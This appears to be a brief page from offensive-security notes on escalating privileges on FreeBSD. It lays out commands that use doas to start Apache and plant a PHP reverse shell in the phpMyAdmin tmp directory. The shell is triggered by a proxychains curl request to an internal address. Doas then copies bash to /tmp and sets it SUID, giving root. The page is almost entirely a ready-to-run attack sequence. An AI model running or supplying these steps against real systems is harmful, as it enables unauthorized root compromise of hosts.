FreeBSD

If the user www is apart of the wheel group, you can start the apache2 service, plant a reverse shell and become www

/usr/local/bin/doas service apache24 onestart
cd /usr/local/www/apache24/data/phpMyAdmin/tmp
vi shell.php
proxychains -q curl 172.16.195.20/phpMyAdmin/tmp/shell.php

Now you can use /usr/local/bin/doas to become root

/usr/local/bin/doas cp /bin/bash /tmp && /usr/local/bin/doas chmod u+s /tmp/bash
PreviousPHP Web ApplicationsNextC2

Last updated